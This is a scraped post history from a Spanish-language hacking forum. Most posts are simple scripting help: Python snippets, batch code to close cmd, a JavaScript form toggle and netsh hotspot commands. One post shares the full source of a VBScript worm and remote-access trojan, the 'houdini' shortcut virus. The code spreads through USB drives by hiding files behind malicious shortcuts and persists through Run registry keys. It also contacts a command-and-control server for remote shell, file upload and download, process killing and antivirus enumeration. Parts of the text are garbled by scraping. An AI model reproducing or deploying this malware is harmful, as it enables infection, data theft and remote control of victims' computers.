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Mensajes - **Aincrad**

Scripting / Re: Args en python
25 Septiembre 2017, 01:50 AM
Lo se, solo que como puso que:

cita de Sentex
la salida seria asi:


y por eso le puse un code fácil que mostrara en pantalla hola.   ;) entendí mal. solo me deje llevar por lo que queria que saliera en pantalla.
Gracias de nuevo Elecktro , el Emgu CV se ve mejor voy a empezar a trabajar en ello .  ;-)
Scripting / Re: Args en python
25 Septiembre 2017, 00:44 AM
hola , hay muchas maneras de hacer lo que pides.

Te lo pongo con códigos super simples:

code 1:

Código (python) [Seleccionar]

code 2:

Código (python) [Seleccionar]
print ("hola")
raw_input("Pulsa una tecla para continuar...")

code 3:
Código (python) [Seleccionar]
print ("hola")

                              Mas simple imposible, Comenta si te funciono.
Scripting / Re: No cierra cmd con edlin
25 Septiembre 2017, 00:23 AM
si el comando edlin te funciona no cambies el scrript solo busca otras formas de cerrar la cmd.

Por ejemplo si el exit no funciona sustitúyelo por uno de estos dos codes:

primer code, es muy poco problable que te funcione.
Código (bash) [Seleccionar]

taskkill /F /im cmd.exe > nul

Segundo code , este seguro que te va a cerrar la vestana del cmd:

Código (bash) [Seleccionar]
Call :1

REM Prevent running the 1.vbs twice
Exit /b 0
REM  This will create a file called 1.vbs in %TEMP%
REM  The following will overwite any pre-existing file called %TEMP%\1.vbs
echo.> %TEMP%\1.vbs
echo set taskmgr = GetObject("winmgmts:{impersonationLevel=impersonate}").ExecQuery ("select * from Win32_Process") >> %TEMP%\1.vbs
echo For each process in taskmgr >> %TEMP%\1.vbs
echo. >> %TEMP%\1.vbs
echo If Lcase( = "cmd.exe" then >> %TEMP%\1.vbs
echo Process.terminate >> %TEMP%\1.vbs
echo End If >> %TEMP%\1.vbs
echo. >> %TEMP%\1.vbs
echo Next >> %TEMP%\1.vbs
Cscript.exe //NoLogo "%TEMP%\1.vbs"
Exit /b 0

                                    Comenta si te funciono. Recuerda el primer y segundo code sustituye el comando Exit. Utiliza cualquiera de los dos, aunque te recomiendo el segundo.
Cita de: SrTrp en 24 Septiembre 2017, 04:48 AM
Sigue sin funcionar, trate de poner mi ejecucion en la función pero no..

Prueba el la parte del js:

Código (javascript) [Seleccionar]

<script language="text/javascript">
function mostrar (idFormulario){

no importa, mejor no cifres los archivos ya que muchas veces el navegador croome no lee archivos js cifrados.  ;D
Aquí tienes, mas fácil imposible.

Código (html) [Seleccionar]

//tu formulario. By **Aincrad6**
<form id="formu" style="display: none;">
//el js para mostrar el formulario
<script language="text/javascript">
function mostrar(){
var formulario = document.getElementById('formu'); = block;
//el boton
<input type="button" onclick="mostrar();" />

                                              Comenta si te sirvio
hola a todo les traigo el virus de accesos directos (newphototaday) o tambien conocido como drive.bat ya que virus genera en los usb un batch con ese nombre.

el virus es un vbs.  en pendrives se encuentra con formato wsf por que esta cifrado.

virus vbs:

Código (actionscript) [Seleccionar]

'<[ recoder : houdini (c) skype : houdini-fx ]>

'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=

host = ""
port = 666
installdir = "%temp%"
lnkfile = true
lnkfolder = true

'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=

dim shellobj
set shellobj = wscript.createobject("")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")

'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=

installname = wscript.scriptname
startup = shellobj.specialfolders ("startup") & "\"
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
spliter = "<" & "|" & ">"
sleep = 5000
dim response
dim cmd
dim param
info = ""
usbspreading = ""
startdate = ""
dim oneonce

'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
on error resume next

while true


response = ""
response = post ("is-ready","")
cmd = split (response,spliter)
select case cmd (0)
case "excecute"
     param = cmd (1)
     execute param
case "update"
     param = cmd (1)
     set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
     oneonce.write param
     oneonce.close "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
case "uninstall"
case "send"
     download cmd (1),cmd (2)
case "site-send"
     sitedownloader cmd (1),cmd (2)
case "recv"
     param = cmd (1)
     upload (param)
case  "enum-driver"
     post "is-enum-driver",enumdriver  
case  "enum-faf"
     param = cmd (1)
     post "is-enum-faf",enumfaf (param)
case  "enum-process"
     post "is-enum-process",enumprocess  
case  "cmd-shell"
     param = cmd (1)
     post "is-cmd-shell",cmdshell (param)  
case  "delete"
     param = cmd (1)
     deletefaf (param)
case  "exit-process"
     param = cmd (1)
     exitprocess (param)
case  "sleep"
     param = cmd (1)
     sleep = eval (param)        
end select

wscript.sleep sleep


sub install
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon

for each drive in filesystemobj.drives

if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
   filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
   if  filesystemobj.fileexists (drive.path & "\" & installname)  then
       filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4
   end if
   for each file in filesystemobj.getfolder( drive.path & "\" ).Files
       if not lnkfile then exit for
       if  instr (,".") then
           if  lcase (split(, ".") (ubound(split(, ".")))) <> "lnk" then
               file.attributes = 2+4
               if  ucase ( <> ucase (installname) then
                   filename = split(,".")
                   set lnkobj = shellobj.createshortcut (drive.path & "\"  & filename (0) & ".lnk")
                   lnkobj.windowstyle = 7
                   lnkobj.targetpath = "cmd.exe"
                   lnkobj.workingdirectory = ""
                   lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(," ", chrw(34) & " " & chrw(34)) &"&exit"
                   fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(, ".")(ubound(split(, ".")))& "\") & "\defaulticon\")
                   if  instr (fileicon,",") = 0 then
                       lnkobj.iconlocation = file.path
                       lnkobj.iconlocation = fileicon
                   end if
               end if
           end if
       end if
   for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
       if not lnkfolder then exit for
       folder.attributes = 2+4
       foldername =
       set lnkobj = shellobj.createshortcut (drive.path & "\"  & foldername & ".lnk")
       lnkobj.windowstyle = 7
       lnkobj.targetpath = "cmd.exe"
       lnkobj.workingdirectory = ""
       lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(," ", chrw(34) & " " & chrw(34)) &"&exit"
       foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
       if  instr (foldericon,",") = 0 then
           lnkobj.iconlocation = folder.path
           lnkobj.iconlocation = foldericon
       end if
end If
end If
end if
end sub

sub uninstall
on error resume next
dim filename
dim foldername

shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true

for  each drive in filesystemobj.drives
if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
   for  each file in filesystemobj.getfolder ( drive.path & "\").files
        on error resume next
        if  instr (,".") then
            if  lcase (split(, ".")(ubound(split(, ".")))) <> "lnk" then
                file.attributes = 0
                if  ucase ( <> ucase (installname) then
                    filename = split(,".")
                    filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
                    filesystemobj.deletefile (drive.path & "\" &
                end If
                filesystemobj.deletefile (file.path)
            end if
        end if
    for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
        folder.attributes = 0
end if
end if
end if
end sub

function post (cmd ,param)

post = param "post","http://" & host & ":" & port &"/" & cmd, false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function

function information
on error resume next
if  inf = "" then
   inf = hwid & spliter
   inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter
   inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter

   set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
   set os = root.execquery ("select * from win32_operatingsystem")
   for each osinfo in os
      inf = inf & osinfo.caption & spliter  
      exit for
   inf = inf & "plus" & spliter
   inf = inf & security & spliter
   inf = inf & usbspreading
   information = inf  
   information = inf
end if
end function

sub upstart ()
on error resume Next

shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true

end sub

function hwid
on error resume next

set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
for each disk in disks
   if  disk.volumeserialnumber <> "" then
       hwid = disk.volumeserialnumber
       exit for
   end if
end function

function security
on error resume next

security = ""

set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
   versionstr = split (objitem.version,".")
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
for  x = 1 to ubound (versionstr)
osversion = osversion &  versionstr (i)
osversion = eval (osversion)
if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"

set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)

for each objantivirus in colantivirus
   security  = security  & objantivirus.displayname & " ."
if security  = "" then security  = "nan-av"
end function

function instance
on error resume next

usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
if usbspreading = "" then
  if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then
     usbspreading = "true - " & date
     shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
     usbspreading = "false - " & date
     shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"

  end if
end If

set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort =  filesystemobj.getfile (installdir & installname)
if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
end If
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
if  err.number > 0 then wscript.quit
end function

sub sitedownloader (fileurl,filename)

strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" ) "get", strlink, false

set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
   objfsodownload.deletefile (strsaveto)
end if

if objhttpdownload.status = 200 then
  dim  objstreamdownload
  set  objstreamdownload = createobject("")
  with objstreamdownload
.type = 1
.write objhttpdownload.responsebody
.savetofile strsaveto
  end with
  set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then objfsodownload.getfile (strsaveto).shortpath
end if
end sub

sub download (fileurl,filedir)

if filedir = "" then
  filedir = installdir
end if

strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp") "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
objhttpdownload.send ""

set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
   objfsodownload.deletefile (strsaveto)
end if
if  objhttpdownload.status = 200 then
   dim  objstreamdownload
set  objstreamdownload = createobject("")
   with objstreamdownload
.type = 1
.write objhttpdownload.responsebody
.savetofile strsaveto
end with
   set objstreamdownload  = nothing
end if
if objfsodownload.fileexists(strsaveto) then objfsodownload.getfile (strsaveto).shortpath
end if
end sub

function upload (fileurl)

dim  httpobj,objstreamuploade,buffer
set  objstreamuploade = createobject("")
with objstreamuploade
    .type = 1
.loadfromfile fileurl
buffer = .read
end with
set objstreamdownload = nothing
set httpobj = createobject("msxml2.xmlhttp") "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
httpobj.send buffer
end function

function enumdriver ()

for  each drive in filesystemobj.drives
if   drive.isready = true then
    enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
end if
end Function

function enumfaf (enumdir)

enumfaf = enumdir & spliter
for  each folder in filesystemobj.getfolder (enumdir).subfolders
    enumfaf = enumfaf & & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter

for  each file in filesystemobj.getfolder (enumdir).files
    enumfaf = enumfaf & & "|" & file.size  & "|" & "f" & "|" & file.attributes & spliter

end function

function enumprocess ()

on error resume next

set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)

dim objitem
for each objitem in colitems
enumprocess = enumprocess & & "|"
enumprocess = enumprocess & objitem.processid & "|"
   enumprocess = enumprocess & objitem.executablepath & spliter
end function

sub exitprocess (pid)
on error resume next "taskkill /F /T /PID " & pid,7,true
end sub

sub deletefaf (url)
on error resume next

filesystemobj.deletefile url
filesystemobj.deletefolder url

end sub

function cmdshell (cmd)

dim httpobj,oexec,readallfromany

set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
  readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
  readallfromany = oexec.stderr.readall
  readallfromany = ""
end if

cmdshell = readallfromany
end function

bueno el resultado fue :   con 2 votos

en ese caso de que eligieran el nombre:
Código (bash) [Seleccionar]

@echo off
netsh wlan set hostednetwork mode=allow ssid=%name% key=%cont%
netsh wlan start hostednetwork

simplemente 2 lineas de código netsh tan facil como eso.